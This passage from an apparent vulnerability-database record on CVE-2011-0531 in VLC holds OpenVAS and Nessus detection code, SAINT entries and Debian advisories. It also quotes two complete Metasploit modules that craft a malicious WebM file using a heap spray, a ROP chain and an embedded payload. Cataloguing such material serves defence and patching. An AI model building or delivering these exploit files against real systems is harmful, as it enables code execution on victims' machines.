$\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-12 19:21:50 +0200 (Thu, 12 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3275\", \"CVE-2010-3276\", \"CVE-2010-0522\", \"CVE-2010-1441\", \"CVE-2010-1442\", \"CVE-2011-0531\");\n script_name(\"Debian Security Advisory DSA 2211-1 (vlc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libvlc0\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc0-dev\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-arts\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-esd\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-glide\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"0.8.6.h-4+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc5\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore-dev\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlccore4\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-data\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-dbg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-fluidsynth\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-jack\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-notify\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-pulse\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svg\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-zvbi\", ver:\"1.1.3-1squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "description": "Added: 06/27/2011 \nCVE: [CVE-2011-0531](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0531>) \nBID: [46060](<http://www.securityfocus.com/bid/46060>) \nOSVDB: [70698](<http://www.osvdb.org/70698>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVideoLan VLC 1.1.6.1 and earlier are vulnerable to a remote code execution vulnerability as a result of insufficient input validation. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted `**MKV**` (`**Matroska**` or `**WebM**`) file. \n\n### Resolution\n\nUpgrade to VLC media player 1.1.7 or higher. Patches for some older versions are also available. \n\n### References\n\n<http://www.videolan.org/security/sa1102.html> \n\n\n### Limitations\n\nExploit works on VideoLAN VLC 1.1.0. \n\nThe user must open the exploit file on the target with a vulnerable version of VLC. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-06-27T00:00:00", "published": "2011-06-27T00:00:00", "id": "SAINT:FC3F8691377F5D2858A8DBCB8503CA3B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/vlc_mkv_demuxer", "type": "saint", "title": "VideoLAN VLC Media Player MKV Demuxer Code Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "description": "Added: 06/27/2011 \nCVE: [CVE-2011-0531](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0531>) \nBID: [46060](<http://www.securityfocus.com/bid/46060>) \nOSVDB: [70698](<http://www.osvdb.org/70698>) \n\n\n### Background\n\n[VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVideoLan VLC 1.1.6.1 and earlier are vulnerable to a remote code execution vulnerability as a result of insufficient input validation. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted `**MKV**` (`**Matroska**` or `**WebM**`) file. \n\n### Resolution\n\nUpgrade to VLC media player 1.1.7 or higher. Patches for some older versions are also available. \n\n### References\n\n<http://www.videolan.org/security/sa1102.html> \n\n\n### Limitations\n\nExploit works on VideoLAN VLC 1.1.0. \n\nThe user must open the exploit file on the target with a vulnerable version of VLC. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-06-27T00:00:00", "published": "2011-06-27T00:00:00", "id": "SAINT:406E0DD61EF13D202107AAD34919B826", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/vlc_mkv_demuxer", "title": "VideoLAN VLC Media Player MKV Demuxer Code Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:08:37", "description": "VideoLAN VLC MKV Memory Corruption. CVE-2011-0531. Local exploit for windows platform", "published": "2011-02-08T00:00:00", "type": "exploitdb", "title": "VideoLAN VLC MKV Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "modified": "2011-02-08T00:00:00", "id": "EDB-ID:16637", "href": "https://www.exploit-db.com/exploits/16637/", "sourceData": "##\r\n# $Id: vlc_webm.rb 11725 2011-02-08 18:22:36Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'VideoLAN VLC MKV Memory Corruption',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an input validation error in VideoLAN VLC\r\n\t\t\t\t< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\r\n\t\t\t\tcould execute arbitrary code.\r\n\r\n\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\r\n\t\t\t\tpermanently enable NX support on machines that support it.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'Dan Rosenberg' ],\r\n\t\t\t'Version' => '$Revision: 11725 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '70698' ],\r\n\t\t\t\t\t[ 'CVE', '2011-0531' ],\r\n\t\t\t\t\t[ 'BID', '46060' ],\r\n\t\t\t\t\t[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.videolan.org/security/sa1102.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t=> 1024,\r\n\t\t\t\t\t'DisableNops'\t=> true,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'VLC 1.1.6 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'SprayTarget' => 0x030b030a,\r\n\t\t\t\t\t\t\t'Ret' => 0x6ce091b5,\t\t# Pointer to SprayTarget\r\n\t\t\t\t\t\t\t'Base' => 0x6cd00000,\t\t# Base of libtaglib_plugin.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jan 31, 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.webm']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\trop_base = target[\"Base\"]\r\n\t\tspray = target[\"SprayTarget\"]\r\n\r\n\t\t# EBML Header\r\n\t\tfile = \"\\x1A\\x45\\xDF\\xA3\"\t# EBML\r\n\t\tfile << \"\\x01\\x00\\x00\\x00\"\r\n\t\tfile << \"\\x00\\x00\\x00\\x1F\"\r\n\t\tfile << \"\\x42\\x86\\x81\\x01\"\t# EBMLVersion = 1\r\n\t\tfile << \"\\x42\\xF7\\x81\\x01\"\t# EBMLReadVersion = 1\r\n\t\tfile << \"\\x42\\xF2\\x81\\x04\"\t# EBMLMaxIDLength = 4\r\n\t\tfile << \"\\x42\\xF3\\x81\\x08\"\t# EBMLMaxSizeLength = 8\r\n\t\tfile << \"\\x42\\x82\\x84\\x77\"\t# DocType = \"webm\"\r\n\t\tfile << \"\\x65\\x62\\x6D\"\r\n\t\tfile << \"\\x42\\x87\\x81\\x02\"\t# DocTypeVersion = 2\r\n\t\tfile << \"\\x42\\x85\\x81\\x02\"\t# DocTypeReadVersion = 2\r\n\r\n\t\t# Segment data\r\n\t\tfile << \"\\x18\\x53\\x80\\x67\"\t# (0) Segment\r\n\t\tfile << \"\\x01\\x00\\x00\\x00\"\r\n\t\tfile << \"\\x01\\xD6\\x22\\xF1\"\r\n\r\n\t\t# Seek data\r\n\t\tfile << \"\\x11\\x4D\\x9B\\x74\"\t# (1) SeekHead\r\n\t\tfile << \"\\x40\\x3F\"\r\n\r\n\t\tfile << \"\\x4D\\xBB\\x8B\"\t\t# (2) Seek\r\n\t\tfile << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Segment Info\r\n\t\tfile << \"\\x15\\x49\\xA9\\x66\"\t#\r\n\r\n\t\tfile << \"\\x53\\xAC\\x81\"\t\t# (3) SeekPosition\r\n\t\tfile << \"\\xff\"\t\t\t# \tindex of segment info\r\n\r\n\t\t# Trigger the bug with an out-of-order element\r\n\t\tfile << \"\\x53\\xAB\\x84\"\t\t# (3) SeekID = Tracks\r\n\t\tfile << \"\\x16\\x54\\xAE\\x6B\"\t#\r\n\r\n\t\tfile << \"\\x42\" * 228 \t\t# Padding\r\n\r\n\t\t# Data\r\n\t\tfile << \"\\x15\\x49\\xA9\\x66\"\t# (1) Segment Info\r\n\t\tfile << \"\\x01\\x00\\x00\\x00\"\t#\r\n\t\tfile << \"\\x01\\xff\\xff\\xff\"\t# This triggers our heap spray...\r\n\t\tfile << [target.ret].pack('V')\t# Pointer to our heap spray\r\n\t\r\n\t\t# The alignment plays nice, so EIP will always\r\n\t\t# hit our pivot when our heapspray works. ESI contains\r\n\t\t# 0x030b030a, which will point to one of our \"pop; retn\"\r\n\t\t# pointers, so this works as both a pivot and NOPsled\r\n\t\tblock = [\r\n\t\t\trop_base + 0x229a5,\t\t# xcgh esi,esp; retn\r\n\t\t\trop_base + 0x2c283,\t\t# pop eax; retn\r\n\t\t\t0xdeadbeef,\t\t\t# pad\r\n\t\t\trop_base + 0x2c283,\t\t# pop eax; retn\r\n\t\t]\r\n\t\tblock = block.pack('V*')\r\n\r\n\t\t# ROP payload\r\n\t\trop = [\r\n\t\t\trop_base + 0x1022,\t\t# retn\r\n\r\n\t\t\t# Call VirtualProtect()\r\n\t\t\trop_base + 0x2c283,\t\t# pop eax; retn\r\n\t\t\trop_base + 0x1212a4,\t\t# IAT entry for VirtualProtect -> eax\r\n\t\t\trop_base + 0x12fda,\t\t# mov eax,DWORD PTR [eax]\r\n\t\t\trop_base + 0x29d13,\t\t# jmp eax\r\n\r\n\t\t\trop_base + 0x1022,\t\t# retn\r\n\t\t\tspray & ~0xfff,\t\t\t# lpAddress\r\n\t\t\t0x60000,\t\t\t# dwSize\r\n\t\t\t0x40,\t\t\t\t# flNewProtect\r\n\t\t\tspray - 0x1000,\t\t\t# lpfOldProtect\r\n\r\n\t\t\t# Enough of this ROP business...\r\n\t\t\trop_base + 0xdace8 # push esp; retn\r\n\t\t]\r\n\t\trop = rop.pack('V*')\r\n\r\n\t\t# Overwrite the bad pointer with the address of an infinite\r\n\t\t# loop so the other threads spin instead of crashing\t\r\n\t\trop << \"\\xc7\\x05\"\r\n\t\trop << [spray + 0xc].pack('V')\r\n\t\trop << [rop_base + 0x1c070].pack('V')\t# mov DWORD PTR ds:[ptr],&loop\r\n\r\n\t\t# Restore the stack\r\n\t\trop << \"\\x87\\xe6\"\t\t\t# xchg esi,esp\r\n\r\n\t\t# Payload\r\n\t\trop << payload.encoded\r\n\r\n\t\t# We need to be 16-byte aligned\r\n\t\trop << \"\\xcc\" * (16 - rop.length % 16)\r\n\r\n\t\t# Heapspray and payload, go!\r\n\t\t32.times {\r\n\t\t\t0x3000.times {\r\n\t\t\t\tfile << block\r\n\t\t\t}\r\n\t\t\tfile << rop\r\n\t\t}\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(file)\r\n\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16637/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0531"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2159-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nFebruary 10, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : vlc\r\nVulnerability : missing input sanitising\r\nProblem type : &#40;local&#41;remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-0531\r\n\r\nDan Rosenberg discovered that insufficient input validation in VLC&#39;s \r\nprocessing of Matroska/WebM containers could lead to the execution of \r\narbitrary code. \r\n\r\nFor the stable distribution &#40;squeeze&#41;, this problem has been fixed in\r\nversion 1.1.3-1squeeze3.\r\n\r\nThe version of vlc in the oldstable distribution &#40;lenny&#41; is affected\r\nby further issues and will be addressed in a followup DSA.\r\n\r\nFor the unstable distribution &#40;sid&#41;, this problem has been fixed in\r\nversion 1.1.7-1.\r\n\r\nWe recommend that you upgrade your vlc packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAk1UayYACgkQXm3vHE4uylos6QCeLCU9ynXRns3mmNXdLlUHJcB3\r\nWMwAoMHS56Fvdn4AZYoaoAGulzacvtV1\r\n=ZweI\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:DOC:25701", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25701", "title": "[SECURITY] [DSA 2159-1] vlc security update", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2011-0531"], "description": "Memory corruption on Matroska/WebM \u0441ontainers parsing.", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:VULN:11425", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11425", "title": "VLC media player memory corruption", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:44", "description": "", "published": "2011-02-03T00:00:00", "type": "packetstorm", "title": "VideoLAN VLC MKV Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0531"], "modified": "2011-02-03T00:00:00", "id": "PACKETSTORM:98119", "href": "https://packetstormsecurity.com/files/98119/VideoLAN-VLC-MKV-Memory-Corruption.html", "sourceData": "`## \n# $Id: vlc_webm.rb 11692 2011-02-01 18:54:24Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'VideoLAN VLC MKV Memory Corruption', \n'Description' => %q{ \nThis module exploits an input validation error in VideoLAN VLC \n< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker \ncould execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'Dan Rosenberg' ], \n'Version' => '$Revision: 11692 $', \n'References' => \n[ \n[ 'OSVDB', '70698' ], \n[ 'CVE', '2011-0531' ], \n[ 'BID', '46060' ], \n[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ], \n[ 'URL', 'http://www.videolan.org/security/sa1102.html' ] \n], \n'Payload' => \n{ \n'Space' => 1024, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP3', { 'Ret' => 0x05050505 } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jan 31, 2011', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# EBML Header \nfile = \"\\x1A\\x45\\xDF\\xA3\" # EBML \nfile << \"\\x01\\x00\\x00\\x00\" \nfile << \"\\x00\\x00\\x00\\x1F\" \nfile << \"\\x42\\x86\\x81\\x01\" # EBMLVersion = 1 \nfile << \"\\x42\\xF7\\x81\\x01\" # EBMLReadVersion = 1 \nfile << \"\\x42\\xF2\\x81\\x04\" # EBMLMaxIDLength = 4 \nfile << \"\\x42\\xF3\\x81\\x08\" # EBMLMaxSizeLength = 8 \nfile << \"\\x42\\x82\\x84\\x77\" # DocType = \"webm\" \nfile << \"\\x65\\x62\\x6D\" \nfile << \"\\x42\\x87\\x81\\x02\" # DocTypeVersion = 2 \nfile << \"\\x42\\x85\\x81\\x02\" # DocTypeReadVersion = 2 \n \n# Segment data \nfile << \"\\x18\\x53\\x80\\x67\" # (0) Segment \nfile << \"\\x01\\x00\\x00\\x00\" \nfile << \"\\x01\\xD6\\x22\\xF1\" \n \n# Seek data \nfile << \"\\x11\\x4D\\x9B\\x74\" # (1) SeekHead \nfile << \"\\x40\\x3F\" \n \nfile << \"\\x4D\\xBB\\x8B\" # (2) Seek \nfile << \"\\x53\\xAB\\x84\" # (3) SeekID = Segment Info \nfile << \"\\x15\\x49\\xA9\\x66\" # \n \nfile << \"\\x53\\xAC\\x81\" # (3) SeekPosition \nfile << \"\\xff\" # index of segment info \n \nfile << \"\\x53\\xAB\\x84\" # (3) SeekID = Tracks \nfile << \"\\x16\\x54\\xAE\\x6B\" # \n \nfile << \"\\x42\" * 228 # Padding \n \n# Data \nfile << \"\\x15\\x49\\xA9\\x66\" # (1) Segment Info \nfile << \"\\x01\\x00\\x00\\x00\" # \nfile << \"\\x01\\xff\\xff\\xff\" # This triggers our heap spray... \nfile << [target.ret].pack('V') # Object address \n \n# Spray the heap \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \nfile << ([target.ret].pack('V') * 0xa0000) \nfile << payload.encoded \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \nsend_response_html(cli, file, { 'Content-Type' => 'application/octet-stream' }) \n \nhandler(cli) \n \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/98119/vlc_webm.rb.txt"}], "debian": [{"lastseen": "2020-11-11T13:23:47", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0531"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2159-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nFebruary 10, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : vlc\nVulnerability : missing input sanitising\nProblem type : (local)remote\nDebian-specific: no\nCVE ID : CVE-2011-0531\n\nDan Rosenberg discovered that insufficient input validation in VLC&#x27;s \nprocessing of Matroska/WebM containers could lead to the execution of \narbitrary code. \n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze3.\n\nThe version of vlc in the oldstable distribution (lenny) is affected\nby further issues and will be addressed in a followup DSA.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.7-1.\n\nWe recommend that you upgrade your vlc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n\n\n", "edition": 3, "modified": "2011-02-10T22:49:43", "published": "2011-02-10T22:49:43", "id": "DEBIAN:DSA-2159-1:3FC9F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00024.html", "title": "[SECURITY] [DSA 2159-1] vlc security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:13:22", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0522", "CVE-2011-0531", "CVE-2010-1441", "CVE-2010-3275", "CVE-2010-1442", "CVE-2010-3276"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2211-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 06, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : vlc\nVulnerability : missing input sanitising\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2010-3275 CVE-2010-3276\n\nRicardo Narvaja discovered that missing input sanitising in VLC, a \nmultimedia player and streamer, could lead to the execution of arbitrary \ncode if a user is tricked into opening a malformed media file.\n\nThis update also provides updated packages for oldstable (lenny) for \nvulnerabilities, which have already been addressed in Debian stable\n(squeeze), either during the freeze or in DSA-2159.\n(CVE-2010-0522, CVE-2010-1441, CVE-2010-1442, CVE-2011-0531)\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 0.8.6.h-4+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.1.3-1squeeze4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.8-1.\n\nWe recommend that you upgrade your vlc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-04-06T21:51:11", "published": "2011-04-06T21:51:11", "id": "DEBIAN:DSA-2211-1:256DF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00080.html", "title": "[SECURITY] [DSA 2211-1] vlc security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T06:58:01", "description": "The version of VLC media player installed on the remote host is\nearlier than 1.1.7. Such versions are reportedly affected by the\nfollowing vulnerability :\n\n - Insufficient input validation when parsing a specially\n crafted Matroska or WebM (MKV) file can be exploited to\n execute arbitrary code.", "edition": 23, "published": "2011-02-02T00:00:00", "title": "VLC Media Player < 1.1.7 MKV Input Validation Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0531"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:videolan:vlc_media_player"], "id": "VLC_1_1_7.NASL", "href": "https://www.tenable.com/plugins/nessus/51851", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51851);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2011-0531\");\n script_bugtraq_id(46060);\n\n script_name(english:\"VLC Media Player < 1.1.7 MKV Input Validation Vulnerability\");\n script_summary(english:\"Checks version of VLC\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host contains an media player that is affected by\na code execution vulnerability.\"\n );\n script_set_attribute(\n 